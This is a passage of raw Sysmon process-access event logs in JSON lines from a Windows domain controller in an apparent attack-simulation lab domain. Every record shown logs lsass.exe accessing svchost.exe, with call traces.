07:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4504,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.548\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:55.548","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4505,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.548\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:55.548","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4506,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.564\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:55.564","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4507,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.564\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:55.564","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4508,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.564\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:55.564","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4509,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.689\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:55.689","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4510,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.689\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:55.689","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4511,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.689\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\